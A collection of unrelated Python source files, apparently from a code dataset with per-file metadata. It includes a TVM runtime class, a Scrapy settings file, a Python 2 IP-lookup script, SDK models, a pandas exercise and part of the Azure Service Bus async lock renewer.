VirtualMachine.POOLED_ALLOCATOR if memory_cfg is None: memory_cfg = {} elif isinstance(memory_cfg, str): assert memory_cfg in ["naive", "pooled"] if memory_cfg == "naive": default_alloc_type = VirtualMachine.NAIVE_ALLOCATOR memory_cfg = {} elif not isinstance(memory_cfg, dict): raise TypeError( "memory_cfg is expected be string or dictionary, " + "but received {}".format(type(memory_cfg)) ) init_args = [] for device in devs: init_args.append(device.device_type % RPC_SESS_MASK) init_args.append(device.device_id) alloc_type = memory_cfg[device] if device in memory_cfg else default_alloc_type init_args.append(alloc_type) self._init(*init_args) def set_input(self, func_name, *args, **kwargs): """Set the input to a function. Parameters ---------- func_name : str The name of the function. args : list[tvm.runtime.NDArray] or list[np.ndarray] The arguments to the function. kwargs: dict of str to tvm.runtime.NDArray or np.ndarray Named arguments to the function. """ if kwargs: # kwargs is a super set of the required function parameters. We # only find the ones that are needed. func_params = self._exec.get_function_params(func_name) new_args = [None] * len(func_params) cnt = 0 for k in kwargs: if k in func_params: idx = func_params.index(k) new_args[idx] = kwargs[k] cnt += 1 assert len(args) + cnt == len(func_params) idx = 0 for i, arg in enumerate(new_args): if arg is None: new_args[i] = args[idx] idx += 1 args = new_args cargs = convert(args) self._set_input(func_name, *cargs) def invoke(self, func_name, *args, **kwargs): """Invoke a function. Parameters ---------- func_name : str The name of the function. args : list[tvm.runtime.NDArray] or list[np.ndarray] The arguments to the function. kwargs: dict of str to tvm.runtime.NDArray or np.ndarray Named arguments to the function. Returns ------- result : Object The output. """ if args or kwargs: self.set_input(func_name, *args, **kwargs) return self._invoke(func_name) def run(self, *args, **kwargs): """Run the main function. Parameters ---------- args : list[tvm.runtime.NDArray] or list[np.ndarray] The arguments to the function. kwargs: dict of str to tvm.runtime.NDArray or np.ndarray Named arguments to the function. Returns ------- result : Object The output. """ return self.invoke("main", *args, **kwargs) def invoke_stateful(self, func_name, *args, **kwargs): """Invoke a function and ignore the returned result. Use this function when running over rpc because it is currently impossible to return a ADT object over rpc. To get the outputs, use :py:func`get_outputs`. Parameters ---------- func_name : str The name of the function. args : list[tvm.runtime.NDArray] or list[np.ndarray] The arguments to the function. kwargs: dict of str to tvm.runtime.NDArray or np.ndarray Named arguments to the function. """ if args or kwargs: self.set_input(func_name, *args, **kwargs) self._invoke_stateful(func_name) def get_outputs(self): """Get the outputs from a call to :py:func`invoke_stateful`. Returns ------- outputs : List[NDArray] """ return [self._get_output(i) for i in range(self._get_num_outputs())] def get_input_index(self, input_name, func_name="main"): """Get inputs index via input name. Parameters ---------- name : str The input key name func_name : str The function name Returns ------- index: int The input index. -1 will be returned if the given input name is not found. """ return self._get_input_index(input_name, func_name) def benchmark( self, device, *args, func_name="main", repeat=5, number=5, min_repeat_ms=None, end_to_end=False, **kwargs, ): """Calculate runtime of a function by repeatedly calling it. Use this function to get an accurate measurement of the runtime of a function. The function is run multiple times in order to account for variability in measurements, processor speed or other external factors. Mean, median, standard deviation, min and max runtime are all reported. On GPUs, CUDA and ROCm specifically, special on-device timers are used so that synchonization and data transfer operations are not counted towards the runtime. This allows for fair comparison of runtimes across different functions and models. The `end_to_end` flag switches this behavior to include data transfer operations in the runtime. The benchmarking loop looks approximately like so: .. code-block:: python for r in range(repeat): time_start = now() for n in range(number): func_name() time_end = now() total_times.append((time_end - time_start)/number) Parameters ---------- func_name : str The function to benchmark repeat : int Number of times to run the outer loop of the timing code (see above). The output will contain `repeat` number of datapoints. number : int Number of times to run the inner loop of the timing code. This inner loop is run in between the timer starting and stopping. In order to amortize any timing overhead, `number` should be increased when the runtime of the function is small (less than a 1/10 of a millisecond). min_repeat_ms : Optional[float] If set, the inner loop will be run until it takes longer than `min_repeat_ms` milliseconds. This can be used to ensure that the function is run enough to get an accurate measurement. end_to_end : bool If set, include time to transfer input tensors to the device and time to transfer returned tensors in the total runtime. This will give accurate timings for end to end workloads. args : Sequence[Object] Arguments to the function. These are cached before running timing code, so that data transfer costs are not counted in the runtime. kwargs : Dict[str, Object] Named arguments to the function. These are cached like `args`. Returns ------- timing_results : BenchmarkResult Runtimes of the function. Use `.mean` to access the mean runtime, use `.results` to access the individual runtimes (in seconds). """ min_repeat_ms = 0 if min_repeat_ms is None else min_repeat_ms if end_to_end: # We need to unpack keyword arguments into positional arguments packed_args = list(args) for k, v in kwargs.items(): i = self.get_input_index(k, func_name) if i < 0: raise TypeError(f"{func_name}() got an unexpected keyword argument '{k}'") while i >= len(packed_args): packed_args.append(None) packed_args[i] = v return self.module.time_evaluator( "invoke_return_to_device", device, repeat=repeat, number=number, min_repeat_ms=min_repeat_ms, )(func_name, device.device_type, device.device_id, *packed_args) if args or kwargs: self.set_input(func_name, *args, **kwargs) return self.module.time_evaluator( "invoke", device, repeat=repeat, number=number, min_repeat_ms=min_repeat_ms )(func_name)
b00ab8ba872307d2333753f04e741547c90f2cd0
2793721e5cbfccfedac75556e34dba22999530d7
/Data_Structures/Queue/venv/bin/easy_install-3.7
8f39f903e7eb3bb8428554ff85aff955f127983f
[]
no_license
iafjayoza/Python
135e613d1d23c493b05a009843b40cbca6a1d318
aaa05b0d655c8f0a47ced0100a844d99f852b2a4
refs/heads/master
2022-12-07T07:21:46.494885
2020-09-06T09:03:27
2020-09-06T09:03:27
282,707,082
0
0
null
null
null
null
UTF-8
Python
false
false
481
7
#!/Users/jo049566/Desktop/Jay/Jay_Data/Study_Repo/Python/Projects/Queue/venv/bin/python # EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7' __requires__ = 'setuptools==40.8.0' import re import sys from pkg_resources import load_entry_point if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit( load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')() )
746b0c743ffb8d49b2ff71cf870102d7d7279481
5cea76d53779d466f19a5cf0b51e003586cc4a7b
/py4ops/getip.py
e2bbe141b3b44d2c61828b6bf996715b6e854f17
[]
no_license
evan886/python
40152fdb4885876189580141abe27a983d04e04d
d33e996e93275f6b347ecc2d30f8efe05accd10c
refs/heads/master
2021-06-28T12:35:10.793186
2021-05-26T14:33:40
2021-05-26T14:33:40
85,560,342
2
1
null
2017-10-11T05:31:06
2017-03-20T09:51:50
JavaScript
UTF-8
Python
false
false
599
py
#!/usr/bin/python #-*- coding:utf-8 -*- import socket import fcntl import struct def get_ip_address(ifname): s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) return socket.inet_ntoa(fcntl.ioctl( s.fileno(), 0x8915, # SIOCGIFADDR struct.pack('256s', ifname[:15]) )[20:24]) print get_ip_address('eth0') ''' send email 要用到这个ip 的东西 >>> get_ip_address('eth0') '38.113.228.130' http://blog.csdn.net/heizistudio/article/details/38413739 使用Python获得本机IP地址 http://www.pythonclub.org/python-network-application/get-ip-address '''
be3cab903221403283dcb433087d1d2770b819c1
2aec9c5e8c72b731d3abf22f2a407fe09c1cde09
/SipopPolicyImg/SipopPolicyImg/settings.py
dc0ee7131688caeaf0e766dc8fe3b44d9a87787e
[]
no_license
jiangyg/ZWFproject
8b24cc34970ae0a9c2a2b0039dc527c83a5862b5
aa35bc59566d92721f23d2dd00b0febd268ac2dd
refs/heads/master
2020-09-26T17:01:00.229380
2019-11-15T13:16:21
2019-11-15T13:16:21
226,297,631
0
1
null
2019-12-06T09:55:37
2019-12-06T09:55:36
null
UTF-8
Python
false
false
2,169
py
# Scrapy settings for SipopPolicyImg project # # For simplicity, this file contains only the most important settings by # default. All the other settings are documented here: # # http://doc.scrapy.org/topics/settings.html # SPIDER_MODULES = ['SipopPolicyImg.spiders'] NEWSPIDER_MODULE = 'SipopPolicyImg.spiders' ROBOTSTXT_OBEY = False # USER_AGENT = 'scrapy-redis (+https://github.com/rolando/scrapy-redis)' DUPEFILTER_CLASS = "scrapy_redis.dupefilter.RFPDupeFilter" SCHEDULER = "scrapy_redis.scheduler.Scheduler" SCHEDULER_PERSIST = True SCHEDULER_QUEUE_CLASS = "scrapy_redis.queue.SpiderPriorityQueue" #SCHEDULER_QUEUE_CLASS = "scrapy_redis.queue.SpiderQueue" #SCHEDULER_QUEUE_CLASS = "scrapy_redis.queue.SpiderStack" ITEM_PIPELINES = { 'SipopPolicyImg.pipelines.SipoppolicyPipeline': 300, 'scrapy_redis.pipelines.RedisPipeline': 400, } LOG_LEVEL = 'DEBUG' DOWNLOADER_MIDDLEWARES = { 'SipopPolicyImg.middlewares.RandMiddleware': 543, 'scrapy.contrib.downloadermiddleware.useragent.UserAgentMiddleware': None, } REDIS_HOST = '127.0.0.1' # 也可以根据情况改成 localhost REDIS_PORT = 6379 REDIS_PARAMS = { 'db': 15, } # Introduce an artifical delay to make use of parallelism. to speed up the # crawl. DOWNLOAD_DELAY = 1 CONCURRENT_REQUESTS = 8 RETRY_ENABLED = True # 重试中间件 指定关闭 默认为 True 是开启状态 RETRY_HTTP_CODES = [302] # 指定要重试的 HTTP 状态码,其它错误会被丢弃 RETRY_TIMES = 10 # 指定重试次数 AUTOTHROTTLE_ENABLED = True # 自动限速扩展 AUTOTHROTTLE_START_DELAY = 5.0 # 最初的下载延迟(以秒为单位) AUTOTHROTTLE_MAX_DELAY = 60.0 # 在高延迟情况下设置的最大下载延迟(以秒为单位) AUTOTHROTTLE_DEBUG = True # 启用 AutoThrottle 调试模式,该模式显示收到的每个响应的统计数据,以便可以实时调节参数 AUTOTHROTTLE_TARGET_CONCURRENCY = 10 # Scrapy 应平行发送到远程网站的请求数量 将此选项设置为更高的值以增加吞吐量和远程服务器上的负载 将此选项设置为更低的值以使爬虫更保守和礼貌 HTTPERROR_ALLOWED_CODES = [302, 500, 502, 404, 403, 503]
3aafacd2c3e9f63889114636ae310d1c6ca37f74
f7d343efc7b48818cac4cf9b98423b77345a0067
/training/rotateArray.py
e9806b40cb7999c3ceb19bcba0f938c7c66662d9
[]
no_license
vijaymaddukuri/python_repo
70e0e24d0554c9fac50c5bdd85da3e15c6f64e65
93dd6d14ae4b0856aa7c6f059904cc1f13800e5f
refs/heads/master
2023-06-06T02:55:10.393125
2021-06-25T16:41:52
2021-06-25T16:41:52
151,547,280
0
1
null
null
null
null
UTF-8
Python
false
false
122
py
n=[1,2,3,4,5,6,7] k=3 def rotateArray(n, k): new=n[k:]+n[:k] return new newArray=rotateArray(n,k) print(newArray)
09b541231ca7b26b86b963b1d56d20ded60d96a8
971e0efcc68b8f7cfb1040c38008426f7bcf9d2e
/tests/artificial/transf_Anscombe/trend_ConstantTrend/cycle_12/ar_/test_artificial_128_Anscombe_ConstantTrend_12__100.py
90590116d599656197e31e656d41ca810bd1f95f
[ "BSD-3-Clause", "LicenseRef-scancode-unknown-license-reference" ]
permissive
antoinecarme/pyaf
a105d172c2e7544f8d580d75f28b751351dd83b6
b12db77cb3fa9292e774b2b33db8ce732647c35e
refs/heads/master
2023-09-01T09:30:59.967219
2023-07-28T20:15:53
2023-07-28T20:15:53
70,790,978
457
77
BSD-3-Clause
2023-03-08T21:45:40
2016-10-13T09:30:30
Python
UTF-8
Python
false
false
269
py
import pyaf.Bench.TS_datasets as tsds import tests.artificial.process_artificial_dataset as art art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "ConstantTrend", cycle_length = 12, transform = "Anscombe", sigma = 0.0, exog_count = 100, ar_order = 0);
62476df0b7f7d2e336afdd3147f644b538346cf3
6e9c127bd6705a8b92f240ca663163504b86cd81
/elecsim/reinforcement_learning/__init__.py
c81092b6f862e68895065cc1c34baacd81f097c9
[ "MIT" ]
permissive
alexanderkell/elecsim
239ffd539d1b04f24186ddaae20ac4ce6b258c03
df9ea14cbc8dd3fd4302be9274cb6ea61c0cdb10
refs/heads/master
2023-04-06T10:03:35.367411
2023-04-05T16:52:16
2023-04-05T16:52:16
124,561,430
36
10
MIT
2022-12-08T01:57:45
2018-03-09T15:55:53
Jupyter Notebook
UTF-8
Python
false
false
229
py
""" File name: __init__.py Date created: 01/03/2019 Feature: #Enter feature description here """ __author__ = "Alexander Kell" __copyright__ = "Copyright 2018, Alexander Kell" __license__ = "MIT" __email__ = "[email protected]"
53de0dc2fc3ca23f7489ba815b0d47e166c0a41d
54a0b86d4c3f731487ad4470fb365907970472e6
/P1/studentparameters/Project1_Parameters_gg.py
84f2505c0e7969acde0d86286867f8a7f41dcddc
[]
no_license
samiurrahman98/ece458-computer-security
26aa46e174b0bf77f748e6451dd2e0e4183feebd
cf79430b98e3679ffcd687a0c96b5e979187e1e3
refs/heads/master
2022-11-25T01:26:36.874094
2020-07-31T21:24:53
2020-07-31T21:24:53
280,979,038
0
0
null
null
null
null
UTF-8
Python
false
false
1,771
py
# Select the file name that matches your first two letters of your last name on Learn # Read those parameters as your ECE458 project 1 parameters # p,q,g are DSA domain parameters, sk_i (secret keys) are used in each signature and verification p=16158504202402426253991131950366800551482053399193655122805051657629706040252641329369229425927219006956473742476903978788728372679662561267749592756478584653187379668070077471640233053267867940899762269855538496229272646267260199331950754561826958115323964167572312112683234368745583189888499363692808195228055638616335542328241242316003188491076953028978519064222347878724668323621195651283341378845128401263313070932229612943555693076384094095923209888318983438374236756194589851339672873194326246553955090805398391550192769994438594243178242766618883803256121122147083299821412091095166213991439958926015606973543 q=13479974306915323548855049186344013292925286365246579443817723220231 g=9891663101749060596110525648800442312262047621700008710332290803354419734415239400374092972505760368555033978883727090878798786527869106102125568674515087767296064898813563305491697474743999164538645162593480340614583420272697669459439956057957775664653137969485217890077966731174553543597150973233536157598924038645446910353512441488171918287556367865699357854285249284142568915079933750257270947667792192723621634761458070065748588907955333315440434095504696037685941392628366404344728480845324408489345349308782555446303365930909965625721154544418491662738796491732039598162639642305389549083822675597763407558360 sk1=4238046188863111196134523391567180673009409153722853144581286972290 sk2=5251810960028969703460342961462449674500434928936370393443116963182 sk3=1290595980181313010068948362172310388515606811911036234145294356283
2b8a2244e4e8b8f8a97d5cbe7d0d579cd8508d15
bc1525a4e85e49829ccbf7cfc9db6881790fa3a7
/pyUbiForge/ACU/type_readers/788BAA0D.py
cf65a21e511965a7960ee2750c94202ea6eb269d
[]
no_license
christianbethel1993/ACExplorer
5183228c1c1beb5d7a3c768f5c8345e00e38f82f
f343de8925e0ca08aff7d2719c5e885dc3e503ac
refs/heads/master
2023-03-26T13:57:15.390140
2019-07-02T12:05:23
2019-07-02T12:05:23
null
0
0
null
null
null
null
UTF-8
Python
false
false
373
py
from pyUbiForge.misc.file_object import FileObjectDataWrapper from pyUbiForge.misc.file_readers import BaseReader class Reader(BaseReader): file_type = '788BAA0D' def __init__(self, file_object_data_wrapper: FileObjectDataWrapper): for _ in range(4): for _ in range(4): file_object_data_wrapper.read_float_32() file_object_data_wrapper.out_file_write('\n')
1ccbc85a8f20324d99f2b2eb30db1d21ed445f07
1f51c4e89a71ea3fcc2cc921613aacc19e078b69
/16_Cleaning Data in Python [Part - 1]/02_Text and categorical data problems/06_Removing titles and taking names.py
e3da04a5987946e045f113e8723ed5864fb6283b
[ "MIT" ]
permissive
CodeHemP/CAREER-TRACK-Data-Scientist-with-Python
871bafbd21c4e754beba31505965572dd8457adc
13ebb10cf9083343056d5b782957241de1d595f9
refs/heads/main
2023-03-26T08:43:37.054410
2021-03-22T15:08:12
2021-03-22T15:08:12
471,015,287
1
0
MIT
2022-03-17T13:52:32
2022-03-17T13:52:31
null
UTF-8
Python
false
false
1,407
py
''' 06 - Removing titles and taking names While collecting survey respondent metadata in the airlines DataFrame, the full name of respondents was saved in the full_name column. However upon closer inspection, you found that a lot of the different names are prefixed by honorifics such as "Dr.", "Mr.", "Ms." and "Miss". Your ultimate objective is to create two new columns named first_name and last_name, containing the first and last names of respondents respectively. Before doing so however, you need to remove honorifics. The airlines DataFrame is in your environment, alongside pandas as pd. Instructions: - Remove "Dr.", "Mr.", "Miss" and "Ms." from full_name by replacing them with an empty string "" in that order. - Run the assert statement using .str.contains() that tests whether full_name still contains any of the honorifics. ''' # Replace "Dr." with empty string "" airlines['full_name'] = airlines['full_name'].str.replace("Dr.", "") # Replace "Mr." with empty string "" airlines['full_name'] = airlines['full_name'].str.replace("Mr.", "") # Replace "Miss" with empty string "" airlines['full_name'] = airlines['full_name'].str.replace("Miss", "") # Replace "Ms." with empty string "" airlines['full_name'] = airlines['full_name'].str.replace("Ms.", "") # Assert that full_name has no honorifics assert airlines['full_name'].str.contains('Ms.|Mr.|Miss|Dr.').any() == False
3cd902ce5209b6c7863f07b1602b49859de1031e
4d2475135f5fc9cea73572b16f59bfdc7232e407
/prob224_basic_calculator.py
e775df1d9d3e1655e6652d7439cd899e9757ac9c
[]
no_license
Hu-Wenchao/leetcode
5fa0ae474aadaba372756d234bc5ec397c8dba50
31b2b4dc1e5c3b1c53b333fe30b98ed04b0bdacc
refs/heads/master
2021-06-24T04:57:45.340001
2017-06-17T02:33:09
2017-06-17T02:33:09
45,328,724
0
0
null
null
null
null
UTF-8
Python
false
false
954
py
""" Implement a basic calculator to evaluate a simple expression string. The expression string may contain open ( and closing parentheses ), the plus + or minus sign -, non-negative integers and empty spaces . You may assume that the given expression is always valid. Some examples: "1 + 1" = 2 " 2-1 + 2 " = 3 "(1+(4+5+2)-3)+(6+8)" = 23 """ class Solution(object): def calculate(self, s): """ :type s: str :rtype: int """ total = 0 i, signs = 0, [1, 1] while i < len(s): c = s[i] if c.isdigit(): start = i while i < len(s) and s[i].isdigit(): i += 1 total += signs.pop() * int(s[start:i]) continue if c in '+-(': signs.append(signs[-1] * (1, -1)[c == '-']) elif c == ')': signs.pop() i += 1 return total
78cc2c0e6ce7233a114f720346695cd17917852a
f6c051b15e29fbf1501499d5551c0d9237da0852
/order/migrations/0008_auto_20210108_0304.py
8fa64fe7e7a2df8ee6ded7dac0bf581c23033732
[]
no_license
Deepjyoti13/eCommerce
8e672d2c4b6f708ef4ac1b66521ce72d2fe2cc39
b0745b8c3a410f7ee8182496c556229748fd3265
refs/heads/master
2023-02-25T04:00:47.068320
2021-01-24T19:21:13
2021-01-24T19:21:13
321,396,947
0
1
null
null
null
null
UTF-8
Python
false
false
560
py
# Generated by Django 3.1.4 on 2021-01-07 21:34 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('order', '0007_order_tracking'), ] operations = [ migrations.AlterField( model_name='order', name='status', field=models.CharField(choices=[('New', 'New'), ('Accepted', 'Accepted'), ('Preparing', 'Preparing'), ('On Shipping', 'On Shipping'), ('Completed', 'Completed'), ('Canceled', 'Canceled')], default='New', max_length=50), ), ]
f1c57d57d4175a117e64f2370c9b2da75032aefd
5cea76d53779d466f19a5cf0b51e003586cc4a7b
/project/chapter29squish/config.py
c0a9c78f74009e17e69d5662bf33698d71ab2bc1
[]
no_license
evan886/python
40152fdb4885876189580141abe27a983d04e04d
d33e996e93275f6b347ecc2d30f8efe05accd10c
refs/heads/master
2021-06-28T12:35:10.793186
2021-05-26T14:33:40
2021-05-26T14:33:40
85,560,342
2
1
null
2017-10-11T05:31:06
2017-03-20T09:51:50
JavaScript
UTF-8
Python
false
false
713
py
# Configuration file for Squish # ----------------------------- # Feel free to modify the configuration variables below to taste. # If the game is too fast or too slow, try to modify the speed # variables. # Change these to use other images in the game: banana_image = 'banana.png' weight_image = 'weight.png' splash_image = 'weight.png' #splash_image = 'banana.png' # Change these to affect the general appearance: screen_size = 800, 600 background_color = 255, 255, 255 margin = 30 full_screen = 0 #full_screen = 1 #font_size = 68 font_size = 48 # These affect the behavior of the game: drop_speed = 1 banana_speed = 1 speed_increase = 1 weights_per_level = 10 banana_pad_top = 40 banana_pad_side = 20
9fcb80ebf6ba49d19469342df5512714fae0445e
c7cbbd4b1c1e281cef5f4a0c4e3d4a97cee2241e
/froide/accesstoken/views.py
f7bfb75707d18ad131e30d2a36f10fd8cc21fc26
[ "MIT" ]
permissive
manonthemat/froide
078cf78a6eb35226512c0bdfa2ac9043bcc81ad9
698c49935eaf2e922f3c9f6a46af0fd545ccbbbb
refs/heads/master
2020-08-14T08:19:36.215473
2019-10-14T19:43:16
2019-10-14T19:43:16
215,129,869
0
0
MIT
2019-10-14T19:35:49
2019-10-14T19:35:49
null
UTF-8
Python
false
false
669
py
from django.views.decorators.http import require_POST from django.utils.translation import ugettext_lazy as _ from django.contrib import messages from froide.helper.utils import render_403, get_redirect from .forms import ResetTokenForm @require_POST def reset_token(request): if not request.user.is_authenticated: return render_403(request) form = ResetTokenForm(data=request.POST, user=request.user) if form.is_valid(): message = form.save() messages.add_message(request, messages.SUCCESS, message) else: messages.add_message(request, messages.ERROR, _('Failed to reset token.')) return get_redirect(request)
990b85fea581c3710a827f71f87d0f2bc9447d5f
ef54d37f8a3303013ca7469871a320d303957ed7
/robo4.2/4.2/lib/python2.7/site-packages/robot/libraries/dialogs_py.py
252b6948049aa0b01ab2f54bdf4e68c57aabb39a
[]
no_license
richa92/Jenkin_Regression_Testing
d18badfcf16bda682dfe7bcbbd66f54a9a27a58d
24a74926170cbdfafa47e972644e2fe5b627d8ff
refs/heads/master
2020-07-12T10:01:59.099137
2019-08-27T12:14:53
2019-08-27T12:14:53
null
0
0
null
null
null
null
UTF-8
Python
false
false
5,703
py
# Copyright 2008-2015 Nokia Networks # Copyright 2016- Robot Framework Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import sys from threading import currentThread import time try: # from Tkinter import (Button, Entry, Frame, Label, Listbox, TclError, Toplevel, Tk, BOTH, END, LEFT, W) except ImportError: # from tkinter import (Button, Entry, Frame, Label, Listbox, TclError, Toplevel, Tk, BOTH, END, LEFT, W) class _TkDialog(Toplevel): _left_button = 'OK' _right_button = 'Cancel' def __init__(self, message, value=None, **extra): self._prevent_execution_with_timeouts() self._parent = self._get_parent() Toplevel.__init__(self, self._parent) self._initialize_dialog() self._create_body(message, value, **extra) self._create_buttons() self._result = None def _prevent_execution_with_timeouts(self): if 'linux' not in sys.platform \ and currentThread().getName() != 'MainThread': raise RuntimeError('Dialogs library is not supported with ' 'timeouts on Python on this platform.') def _get_parent(self): parent = Tk() parent.withdraw() return parent def _initialize_dialog(self): self.title('Robot Framework') self.grab_set() self.protocol("WM_DELETE_WINDOW", self._close) self.bind("<Escape>", self._close) self.minsize(250, 80) self.geometry("+%d+%d" % self._get_center_location()) self._bring_to_front() def grab_set(self, timeout=30): maxtime = time.time() + timeout while time.time() < maxtime: try: # Fails at least on Linux if mouse is hold down. return Toplevel.grab_set(self) except TclError: pass raise RuntimeError('Failed to open dialog in %s seconds. One possible ' 'reason is holding down mouse button.' % timeout) def _get_center_location(self): x = (self.winfo_screenwidth() - self.winfo_reqwidth()) // 2 y = (self.winfo_screenheight() - self.winfo_reqheight()) // 2 return x, y def _bring_to_front(self): self.attributes('-topmost', True) self.attributes('-topmost', False) def _create_body(self, message, value, **extra): frame = Frame(self) Label(frame, text=message, anchor=W, justify=LEFT, wraplength=800).pack(fill=BOTH) selector = self._create_selector(frame, value, **extra) if selector: selector.pack(fill=BOTH) selector.focus_set() frame.pack(padx=5, pady=5, expand=1, fill=BOTH) def _create_selector(self, frame, value): return None def _create_buttons(self): frame = Frame(self) self._create_button(frame, self._left_button, self._left_button_clicked) self._create_button(frame, self._right_button, self._right_button_clicked) frame.pack() def _create_button(self, parent, label, callback): if label: button = Button(parent, text=label, width=10, command=callback) button.pack(side=LEFT, padx=5, pady=5) def _left_button_clicked(self, event=None): if self._validate_value(): self._result = self._get_value() self._close() def _validate_value(self): return True def _get_value(self): return None def _close(self, event=None): # self.destroy() is not enough on Linux self._parent.destroy() def _right_button_clicked(self, event=None): self._result = self._get_right_button_value() self._close() def _get_right_button_value(self): return None def show(self): self.wait_window(self) return self._result class MessageDialog(_TkDialog): _right_button = None class InputDialog(_TkDialog): def __init__(self, message, default='', hidden=False): _TkDialog.__init__(self, message, default, hidden=hidden) def _create_selector(self, parent, default, hidden): self._entry = Entry(parent, show='*' if hidden else '') self._entry.insert(0, default) self._entry.select_range(0, END) return self._entry def _get_value(self): return self._entry.get() class SelectionDialog(_TkDialog): def __init__(self, message, values): _TkDialog.__init__(self, message, values) def _create_selector(self, parent, values): self._listbox = Listbox(parent) for item in values: self._listbox.insert(END, item) self._listbox.config(width=0) return self._listbox def _validate_value(self): return bool(self._listbox.curselection()) def _get_value(self): return self._listbox.get(self._listbox.curselection()) class PassFailDialog(_TkDialog): _left_button = 'PASS' _right_button = 'FAIL' def _get_value(self): return True def _get_right_button_value(self): return False
35dfe86db227e3ebcc4020419a9b458da4804d07
7bededcada9271d92f34da6dae7088f3faf61c02
/pypureclient/flashblade/FB_2_8/models/quota_setting_response.py
911d109050831d4426d6f40b7851420fcdcd0f2a
[ "BSD-2-Clause" ]
permissive
PureStorage-OpenConnect/py-pure-client
a5348c6a153f8c809d6e3cf734d95d6946c5f659
7e3c3ec1d639fb004627e94d3d63a6fdc141ae1e
refs/heads/master
2023-09-04T10:59:03.009972
2023-08-25T07:40:41
2023-08-25T07:40:41
160,391,444
18
29
BSD-2-Clause
2023-09-08T09:08:30
2018-12-04T17:02:51
Python
UTF-8
Python
false
false
3,181
py
# coding: utf-8 """ FlashBlade REST API A lightweight client for FlashBlade REST API 2.8, developed by Pure Storage, Inc. (http://www.purestorage.com/). OpenAPI spec version: 2.8 Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re import six import typing from ....properties import Property if typing.TYPE_CHECKING: from pypureclient.flashblade.FB_2_8 import models class QuotaSettingResponse(object): """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'items': 'list[QuotaSetting]' } attribute_map = { 'items': 'items' } required_args = { } def __init__( self, items=None, # type: List[models.QuotaSetting] ): """ Keyword args: items (list[QuotaSetting]): A list of quota settings objects. """ if items is not None: self.items = items def __setattr__(self, key, value): if key not in self.attribute_map: raise KeyError("Invalid key `{}` for `QuotaSettingResponse`".format(key)) self.__dict__[key] = value def __getattribute__(self, item): value = object.__getattribute__(self, item) if isinstance(value, Property): return None else: return value def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.swagger_types): if hasattr(self, attr): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value if issubclass(QuotaSettingResponse, dict): for key, value in self.items(): result[key] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, QuotaSettingResponse): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
0834a5b08c86116c058a156d90a1ff41c16fbe22
aa0270b351402e421631ebc8b51e528448302fab
/sdk/servicebus/azure-servicebus/azure/servicebus/aio/_async_auto_lock_renewer.py
0bc36d7b473330ffd0a344b4b93c2976c7fb5cbd
[ "MIT", "LGPL-2.1-or-later", "LicenseRef-scancode-generic-cla" ]
permissive
fangchen0601/azure-sdk-for-python
d04a22109d0ff8ff209c82e4154b7169b6cb2e53
c2e11d6682e368b2f062e714490d2de42e1fed36
refs/heads/master
2023-05-11T16:53:26.317418
2023-05-04T20:02:16
2023-05-04T20:02:16
300,440,803
0
0
MIT
2020-10-16T18:45:29
2020-10-01T22:27:56
null
UTF-8
Python
false
false
10,532
py
# ------------------------------------------------------------------------ # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # ------------------------------------------------------------------------- import asyncio import logging import datetime from typing import Optional, Iterable, Any, Union, Callable, Awaitable, List from .._common.message import ServiceBusReceivedMessage from ._servicebus_session_async import ServiceBusSession from ._servicebus_receiver_async import ServiceBusReceiver from .._common.utils import ( get_renewable_start_time, utc_now, get_renewable_lock_duration, ) from .._common.auto_lock_renewer import SHORT_RENEW_OFFSET, SHORT_RENEW_SCALING_FACTOR from ._async_utils import get_dict_with_loop_if_needed from ..exceptions import AutoLockRenewTimeout, AutoLockRenewFailed, ServiceBusError Renewable = Union[ServiceBusSession, ServiceBusReceivedMessage] AsyncLockRenewFailureCallback = Callable[ [Renewable, Optional[Exception]], Awaitable[None] ] _log = logging.getLogger(__name__) class AutoLockRenewer: """Auto lock renew. An asynchronous AutoLockRenewer handler for renewing the lock tokens of messages and/or sessions in the background. :param max_lock_renewal_duration: A time in seconds that locks registered to this renewer should be maintained for. Default value is 300 (5 minutes). :type max_lock_renewal_duration: float :param on_lock_renew_failure: A callback may be specified to be called when the lock is lost on the renewable that is being registered. Default value is None (no callback). :type on_lock_renew_failure: Optional[LockRenewFailureCallback] .. admonition:: Example: .. literalinclude:: ../samples/async_samples/sample_code_servicebus_async.py :start-after: [START auto_lock_renew_message_async] :end-before: [END auto_lock_renew_message_async] :language: python :dedent: 4 :caption: Automatically renew a message lock .. literalinclude:: ../samples/async_samples/sample_code_servicebus_async.py :start-after: [START auto_lock_renew_session_async] :end-before: [END auto_lock_renew_session_async] :language: python :dedent: 4 :caption: Automatically renew a session lock """ def __init__( self, max_lock_renewal_duration: float = 300, on_lock_renew_failure: Optional[AsyncLockRenewFailureCallback] = None, loop: Optional[asyncio.AbstractEventLoop] = None, ) -> None: self._internal_kwargs = get_dict_with_loop_if_needed(loop) 